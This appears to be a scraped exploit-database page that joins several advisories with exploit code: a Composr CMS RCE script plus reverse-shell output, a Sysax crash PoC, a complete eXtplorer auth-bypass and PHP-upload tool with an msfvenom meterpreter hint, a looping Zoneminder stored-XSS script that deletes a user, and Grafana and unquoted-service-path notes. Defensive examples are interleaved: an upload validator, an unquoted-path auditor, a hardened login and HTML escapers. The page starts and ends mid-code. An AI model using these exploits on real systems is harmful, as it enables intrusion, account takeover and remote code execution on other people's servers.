<button type="submit" name="login" class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>
<!-- <div class="forgot-phone text-right f-right"> <a href="#" class="text-right f-w-600"> Forgot Password?</a> </div> -->
<div class="forgot-phone text-left f-left">
<a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development Requirement&body = I saw your projects. I want to develop a project" class="text-right f-w-600"> Click here to contact me</a>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="./assets/js/lib/jquery/jquery.min.js"></script>
<script src="./assets/js/lib/bootstrap/js/popper.min.js"></script>
<script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script>
<script src="./assets/js/jquery.slimscroll.js"></script>
<script src="./assets/js/sidebarmenu.js"></script>
<script src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>
<script src="./assets/js/custom.min.js"></script>
<script>
function onReady(callback) {
  var intervalID = window.setInterval(checkReady, 1000);
  function checkReady() {
    if (document.getElementsByTagName('body')[0] !== undefined) {
      window.clearInterval(intervalID);
      callback.call(this);
    }
  }
}
function show(id, value) {
  document.getElementById(id).style.display = value ? 'block' : 'none';
}
onReady(function () {
  show('page', true);
  show('loading', false);
});
</script>
</body>
</html>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management)

## Proof and Exploit:
[href](https://streamable.com/emg0zo)
HireHackking
# Exploit Title: Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 12th January,2022
# CVE ID: CVE-2021-46360
# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS
# Reference: https://github.com/sartlabs/0days/blob/main/Composr-CMS/Exploit.py
# Vendor: https://compo.sr/download.htm
###############################################
#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr

#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup

cookies = {
    'has_cookies': '1',
    'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c',  # You need to change this as it is dynamic
    'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',
    'last_visit': '1641783779',
    'cms_session__b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a',  # You need to change this as it is dynamic
}

headers = {
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': '*/*',
    'Origin': 'http://192.168.56.116',
    'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',
    'Accept-Language': 'en-US,en;q=0.9',
}

params = (
    ('keep_session', 'ef14cc258d93a'),  # You need to change this as it is dynamic
)

data = {
    '_data': 'command=rm .htaccess',  # This command deletes the .htaccess, i.e. disables the protection so that we can upload a .php extension file (possibly the php shell)
    'csrf_token': 'ef14cc258d93a'  # You need to change this as it is dynamic
}

r = requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep_session=ef14cc258d93a',
                  headers=headers, params=params, cookies=cookies, data=data, verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
#datap=response.read()
print(soup)

#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell
#Step3- Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:

┌─[ci@parrot]─[~]
└──╼ $nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984
Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 13:35:13 up 20:11,  1 user,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
user     :0       :0               Thu17   ?xdm?  46:51   0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ pwd
/
$
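Both the Abantecart entry above (an admin adds "php" to the allowed extensions of the media manager) and this Composr entry (an admin removes the .htaccess that stops PHP from executing in the upload directory) share one root cause: the guard against uploading server-executable files is itself an admin-configurable setting. The following is an added example, not code from either project: an upload validator whose ban on server-side executable extensions is hardcoded and cannot be widened by a configured allowlist, plus a heuristic check that an upload directory's .htaccess still disables PHP execution. The extension list, the .htaccess patterns and the sample filenames are constructed for the example.

```python
import os
import re

# Extensions the web server would hand to a PHP handler if such a file landed in
# a web-reachable directory. Deliberately not derived from any admin setting.
SERVER_SIDE_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "pht"}


def upload_allowed(filename, configured_allowlist):
    """Return (ok, reason). The admin allowlist can only narrow what is accepted;
    executable extensions are refused even when the admin has added them."""
    name = os.path.basename(filename.replace("\\", "/"))   # drop any path component
    if not name or name.startswith("."):
        return False, "empty or hidden filename"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = parts[1:]                                        # shell.php.jpg -> ["php", "jpg"]
    banned = SERVER_SIDE_EXECUTABLE.intersection(exts)      # any executable extension anywhere
    if banned:
        return False, "server-side executable extension: " + sorted(banned)[0]
    allow = {e.lower().lstrip(".") for e in configured_allowlist}
    if exts[-1] not in allow:
        return False, "extension ." + exts[-1] + " not in allowlist"
    return True, "ok"


# Heuristic: any one of these Apache directives in the upload directory's
# .htaccess stops PHP from executing there (constructed pattern list).
HTACCESS_PHP_OFF = (
    re.compile(r"^\s*php_flag\s+engine\s+off", re.I | re.M),
    re.compile(r"^\s*RemoveHandler\b", re.I | re.M),
    re.compile(r"^\s*RemoveType\b", re.I | re.M),
    re.compile(r"<FilesMatch[^>]*ph", re.I),
)


def htaccess_disables_php(content):
    """True when the .htaccess text contains a directive that disables PHP execution."""
    return any(p.search(content) for p in HTACCESS_PHP_OFF)


def upload_dir_protected(directory):
    """True only when <directory>/.htaccess exists and disables PHP. A deleted file
    (the Composr step above) or an empty one both count as unprotected."""
    path = os.path.join(directory, ".htaccess")
    if not os.path.isfile(path):
        return False
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return htaccess_disables_php(fh.read())


if __name__ == "__main__":
    # Constructed cases: the Abantecart step adds "php" to the allowlist, which this validator ignores.
    for fn in ("4.php", "shell.php.jpg", "logo.png", "photo.PHTML"):
        print(fn, upload_allowed(fn, ["jpg", "png", "php"]))
    print(htaccess_disables_php("php_flag engine off\n"))
```

Checking every extension in the name rather than only the last one is what stops the classic double-extension bypass, and the `.htaccess` check is a defence-in-depth signal: if an integrity monitor sees the file vanish from an upload directory, that is the same event the Composr entry above triggers by hand.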
HireHackking

Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path

# Exploit Title: Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path
# Exploit by: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.gestionaleopen.org/
# Software Link : https://www.gestionaleopen.org/download/
# Tested Version: 12.00.00
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DB_GO_80" | findstr /i /v """

DB_GO_80    DB_GO_80    C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80    Auto

# Service info:

C:\>sc qc "DB_GO_80"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DB_GO_80
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DB_GO_80
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
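The wmic and sc qc output above is what an auditor collects by hand; on a fleet it is worth parsing. The following is an added example, not part of the advisory: it reads concatenated `sc qc` output, finds services whose BINARY_PATH_NAME is unquoted, and lists the paths the Service Control Manager's CreateProcess call would try before the intended executable, which is the set of locations a local user would need write access to for the hijack to work (CreateProcess appends .exe to a candidate that has no extension, per its documentation). The DB_GO_80 block is the advisory's own output; the ExampleSvc block with spaces in its path is constructed so that the flagging branch is exercised.

```python
import re

# Constructed sample: the advisory's sc qc output for DB_GO_80 followed by a
# constructed service whose unquoted path contains spaces.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: DB_GO_80
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DB_GO_80
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ExampleSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Example Vendor\svc.exe -run
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Example Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def hijack_candidates(binary_path):
    """Paths CreateProcess would try before the intended executable when the
    command line is unquoted. An empty list means there is nothing to hijack:
    either the path is quoted, or no directory before the .exe contains a space."""
    cmd = binary_path.strip()
    if cmd.startswith('"'):
        return []                                   # properly quoted
    end = re.search(r"\.exe(?=\s|$)", cmd, re.IGNORECASE)
    if not end:
        return []                                   # cannot tell where the executable ends
    exe = cmd[:end.end()]
    candidates = []
    for m in re.finditer(r" ", exe):                # each space inside the exe path is a stopping point
        prefix = exe[:m.start()]
        if "." not in prefix.rsplit("\\", 1)[-1]:   # CreateProcess appends .exe when no extension
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def audit_sc_qc(output):
    """Return [(service_name, run_as, candidates)] for every unquoted, hijackable path."""
    findings = []
    for block in re.split(r"(?m)^\s*SERVICE_NAME:", output)[1:]:
        name = block.split("\n", 1)[0].strip()
        path = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", block)
        run_as = re.search(r"SERVICE_START_NAME\s*:\s*(.*)", block)
        if not path:
            continue
        cands = hijack_candidates(path.group(1))
        if cands:
            findings.append((name, run_as.group(1).strip() if run_as else "", cands))
    return findings


if __name__ == "__main__":
    for name, run_as, cands in audit_sc_qc(SAMPLE_SC_QC):
        print(f"{name} (runs as {run_as}) could be hijacked via: {cands}")
```

To run it against a real host, concatenate `sc qc <name>` output for every service (for example from `sc query state= all`) into one file and pass the text to `audit_sc_qc`; the fix for any finding is to quote the path in the service's ImagePath and to make sure the listed candidate locations are not writable by unprivileged users.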
HireHackking

Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

# Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi
# Tested Version: 6.95
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: Sysax_Multi_Server_6.95.py
# 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard
# 3.- Open "Sysax Multi Server"
# 4.- Manage Server Settings...
# 5.- Administrative Settings -> Configure...
# 6.- Click "Enable web based administration and API access"
# 7.- Login -> admin
# 8.- Paste ClipBoard on "Password"
# 9.- Save
# 10.- Crashed

#!/usr/bin/env python
# Writes 800 'A' characters (0x41) to a file for pasting into the Password field
buffer = "\x41" * 800
with open("Sysax_Multi_Server_6.95.txt", "w") as f:
    f.write(buffer)
HireHackking
# Exploit Title: eXtplorer <= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)
# Exploit Author: ErPaciocco
# Author Website: https://erpaciocco.github.io
# Vendor Homepage: https://extplorer.net/
#
# Vendor:
# ==============
# extplorer.net
#
# Product:
# ==================
# eXtplorer <= v2.1.14
#
# eXtplorer is a PHP and Javascript-based File Manager, it allows to browse
# directories, edit, copy, move, delete,
# search, upload and download files, create & extract archives, create new
# files and directories, change file
# permissions (chmod) and more. It is often used as FTP extension for popular
# applications like Joomla.
#
# Vulnerability Type:
# ======================
# Authentication Bypass (& Remote Command Execution)
#
#
# Vulnerability Details:
# =====================
#
# eXtplorer authentication mechanism allows an attacker
# to login into the Admin Panel without knowing the password
# of the victim, but only its username. This vector is exploited
# by not supplying password in POST request.
#
#
# Tested on Windows
#
#
# Reproduction steps:
# ==================
#
# 1) Navigate to Login Panel
# 2) Intercept authentication POST request to /index.php
# 3) Remove 'password' field
# 4) Send it and enjoy!
#
#
# Exploit code(s):
# ===============
#
# Run below PY script from CLI...
#
# [eXtplorer_auth_bypass.py]
#
# Proof Of Concept

try:
    import requests
except ImportError:
    print("ERROR: RUN: pip install requests")
    exit()

import sys
import re
import random
import string
import base64

TARGET = None
WORDLIST = None
_BUILTIN_WL = ['root', 'admin', 'test', 'guest', 'info', 'adm', 'user', 'administrator']
_HOST = None
_PATH = None
_SESSION = None
_HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive'
}


def detect():
    """Fetch extplorer.xml and treat a release whose last version component is below 15 as vulnerable."""
    global _HOST, _PATH, _SESSION
    _HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2]
    _PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/')
    _SESSION = requests.Session()
    raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False)
    if raw.status_code == 200:
        ver = re.findall(r"<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE)
        if ver and int(ver[0][2]) < 15:   # innermost group holds the last version component
            return True
    return False


def auth_bypass():
    """Log in with a POST that carries no 'password' field; returns the username that worked, or False."""
    _HEADERS['X-Requested-With'] = 'XMLHttpRequest'
    params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': 'admin', 'lang': 'english'}
    if WORDLIST is not None:
        if WORDLIST == _BUILTIN_WL:
            info("Attempting to guess an username from builtin wordlist")
            wl = _BUILTIN_WL
        else:
            info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}")
            with open(WORDLIST[0], "r") as f:
                wl = f.read().split('\n')
        for user in wl:
            params['username'] = user
            info(f"Trying with {user}")
            res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)
            if "successful" in res.text:
                return user
    else:
        res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)
        if "successful" in res.text:
            return 'admin'
    return False


def rce():
    """Use the now-authenticated session to upload the PHP payload through the upload action."""
    tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js")
    token = re.findall(r"token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0]
    info(f"CSRF Token obtained: {token}")
    payload = editPayload()
    info("Payload edited to fit local parameters")
    params = {'option': 'com_extplorer', 'action': 'upload', 'dir': f"./{_PATH}",
              'requestType': 'xmlhttprequest', 'confirm': 'true', 'token': token}
    name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
    files = {'userfile[0]': (f"{name}.php", payload)}
    req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False)
    if "successful" in req.text:
        info(f"File {name}.php uploaded in root dir")
        info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php")


def attack():
    if not TARGET:
        error("TARGET needed")
        exit(1)
    if not detect():
        error("eXtplorer vulnerable instance not found!")
        exit(1)
    info("eXtplorer endpoint is vulnerable!")
    username = auth_bypass()
    if username:
        info("Auth bypassed!")
        rce()
    else:
        error("Username 'admin' not found")


def error(message):
    print(f"[E] {message}")


def info(message):
    print(f"[I] {message}")


def editPayload():
    # You can generate payload with msfvenom and paste below base64 encoded result
    # msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64
    return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==")


def help():
    print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution

Usage: python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb]

Options:
    -t      Target host. Provide target IP address (and optionally port).
    -w      Wordlist for user enumeration and authentication (Optional)
    -wb     Use built-in wordlist for user enumeration (Optional)
    -h      Show this help menu.
""")
    return True


# option name -> (number of values it takes, handler receiving the list of values)
args = {"t": (1, lambda *x: (globals().update(TARGET=x[0]))),
        "w": (1, lambda *x: (globals().update(WORDLIST=x[0]))),
        "wb": (0, lambda *x: (globals().update(WORDLIST=_BUILTIN_WL))),
        "h": (0, lambda *x: (help() and exit(0)))}

if __name__ == "__main__":
    argv = sys.argv[1:]
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg.startswith('-') and arg[1:] in args:
            nvals, handler = args[arg[1:]]
            handler(argv[i + 1:i + 1 + nvals])
            i += 1 + nvals
        else:
            i += 1
    attack()
else:
    help()

# ///////////////////////////////////////////////////////////////////////
# [Script examples]
#
#
# c:\>python eXtplorer_auth_bypass.py -t https://target.com
# c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt
# c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb

# Exploitation Method:
# ======================
# Remote

# [+] Disclaimer
# The information contained within this advisory is supplied "as-is" with no
# warranties or guarantees of fitness of use or otherwise.
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and
# that due credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit
# is given to the author. The author is not responsible for any misuse of the
# information contained herein and accepts no responsibility
# for any damage caused by the use or misuse of this information.
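The bypass described above works because the server only verifies a password when the request carries one. The following is an added example, not eXtplorer's code: a login check written in the illustrative pattern that produces exactly that symptom, next to a hardened version that treats a missing or empty credential as a failed login, runs the same key-derivation work for unknown users, and compares digests in constant time. The user record, password and PBKDF2 parameters are constructed for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000   # constructed; pick per your hardware budget


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 record: (salt, iterations, digest)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, ITERATIONS, digest


def verify(record, password):
    salt, iterations, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


# Constructed user store.
USERS = {"admin": hash_password("correct horse battery staple")}


def login_vulnerable(form, users):
    """Illustrative pattern (not eXtplorer's code): the password is only checked
    when the field is present, so a POST without 'password' is accepted."""
    record = users.get(form.get("username"))
    if record is None:
        return False
    if "password" in form:
        return verify(record, form["password"])
    return True


def login_hardened(form, users):
    """Absence of either field is a failed login, never a skipped check."""
    username = form.get("username")
    password = form.get("password")
    if not isinstance(username, str) or not isinstance(password, str) or not password:
        return False
    record = users.get(username)
    if record is None:
        # Burn the same KDF cost so a missing user is not faster than a wrong password.
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"\x00" * 16, ITERATIONS)
        return False
    return verify(record, password)


if __name__ == "__main__":
    no_password = {"username": "admin"}          # the request the advisory's step 3 produces
    print("vulnerable:", login_vulnerable(no_password, USERS))
    print("hardened:  ", login_hardened(no_password, USERS))
```

The structural lesson is that authentication code should have one path to "success" and that path must consume every required credential; a branch that returns success when a field is absent is a bypass waiting for someone to delete a form parameter.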
HireHackking

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass

# Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)
# Date: 10/01/2022
# Exploit Author: Trenches of IT
# Vendor Homepage: https://github.com/ZoneMinder/zoneminder
# Version: v1.36.26
# Tested on: Linux/Windows
# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291
# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/
#
# Proof of Concept:
# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)
# 2 - Admin user navigates to http://<target>/zm/index.php?view=log
# 3 - XSS executes delete function on target UID (user).

import requests
import re
import time
import argparse
import sys


def getOptions(args=sys.argv[1:]):
    parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC",
                                     epilog="Example: poc.py -i 1.2.3.4 -p 80 -zU lowpriv -zP lowpriv -d 1")
    parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4)", required=True)
    parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80)", required=True)
    parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv)", required=True)
    parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv)", required=True)
    parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7)", required=True)
    options = parser.parse_args(args)
    return options


options = getOptions(sys.argv[1:])

# Log 'file' value: closes the table cell and injects a script tag that triggers the user delete action
payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F</td></tr><script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'</script>"

# Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username=" + options.username + "&password=" + options.password
loginCookies = {
    "zmSkin": "classic",
    "zmCSS": "base",
    "zmLogsTable.bs.table.pageNumber": "1",
    "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D",
    "zmEventsTable.bs.table.searchText": "",
    "zmEventsTable.bs.table.pageNumber": "1",
    "zmBandwidth": "high",
    "zmHeaderFlip": "up",
    "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2",
}
loginHeaders = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://" + options.ip,
    "Connection": "close",
    "Referer": "http://" + options.ip + "/zm/index.php?view=login",
    "Upgrade-Insecure-Requests": "1",
}
response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)
zmHeaders = response.headers

try:
    zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders))
    finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';')
except (IndexError, TypeError):
    print("[ERROR] Ensure the provided username and password is correct.")
    sys.exit(1)

print("Collected the low privilege user session token: " + finalSession)

# Request using response headers to obtain CSRF value
csrfUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?view=filter"
csrfCookies = {
    "zmSkin": "classic",
    "zmCSS": "base",
    "zmLogsTable.bs.table.pageNumber": "1",
    "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D",
    "zmEventsTable.bs.table.searchText": "",
    "zmEventsTable.bs.table.pageNumber": "1",
    "zmBandwidth": "high",
    "zmHeaderFlip": "up",
    "ZMSESSID": '"' + finalSession + '"',
}
csrfHeaders = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Referer": "http://" + options.ip + "/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1",
    "Upgrade-Insecure-Requests": "1",
}
response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)
zmBody = response.text
extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody))
finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '')
print("Collected the CSRF key for the log injection request: " + finalCsrfKey)
print("Navigate here with an admin user: http://" + options.ip + "/zm/index.php?view=log")

while True:
    # XSS Request: write the payload into the log 'file' field via the log create task
    xssUrl = "http://" + options.ip + "/zm/index.php"
    xssCookies = {
        "zmSkin": "classic",
        "zmCSS": "base",
        "zmLogsTable.bs.table.pageNumber": "1",
        "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D",
        "zmEventsTable.bs.table.searchText": "",
        "zmEventsTable.bs.table.pageNumber": "1",
        "zmBandwidth": "high",
        "zmHeaderFlip": "up",
        "ZMSESSID": finalSession,
    }
    xssHeaders = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": "http://" + options.ip,
        "Connection": "close",
        "Referer": "http://" + options.ip + "/zm/index.php?view=filter",
    }
    xssData = {
        "__csrf_magic": finalCsrfKey,
        "view": "request",
        "request": "log",
        "task": "create",
        "level": "ERR",
        "message": "Trenches%20of%20IT%20PoC",
        "browser[name]": "Firefox",
        "browser[version]": "91.0",
        "browser[platform]": "UNIX",
        "file": payload,
        "line": "105",
    }
    response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
    print("Injecting payload: " + response.text)
    time.sleep(1)
HireHackking

Grafana <=6.2.4 - HTML Injection

# Exploit Title: Grafana <=6.2.4 - HTML Injection
# Date: 30-06-2019
# Exploit Author: SimranJeet Singh
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download/6.2.4
# Version: 6.2.4
# CVE : CVE-2019-13068

The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field)

Payload used - <img src="[image_URL]"><h1>Hello</h1>
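Four entries on this page are the same bug in four HTML contexts: the Canteen-Management request path lands inside a double-quoted form `action` attribute, the Password Manager `ReturnURL` is reflected as page content, the Zoneminder log `file` field is rendered inside a table cell, and the Grafana drilldown link title and URL go into an `<a>` element. The following is an added example, not code from any of those projects: three small renderers that escape for the context they write into and refuse non-http(s) link schemes, exercised with the payload shapes shown in the advisories. The renderers, function names and sample values are constructed for the example.

```python
import html
from urllib.parse import urlsplit


def esc_text(value):
    """Escape for a text node: & < > become entities."""
    return html.escape(str(value), quote=False)


def esc_attr(value):
    """Escape for a double-quoted attribute value: also neutralises quotes, so the
    Canteen-Management '"><a href=...' breakout stays inside the attribute."""
    return html.escape(str(value), quote=True)


def safe_url(value):
    """Allow only http(s) or scheme-less URLs in href/src/action; anything else becomes '#'."""
    parts = urlsplit(str(value).strip())
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return "#"
    return esc_attr(value)


def render_login_form(request_path):
    """The Canteen-Management case: request path copied into the form action attribute."""
    return f'<form action="{esc_attr(request_path)}" method="post" id="loginForm">'


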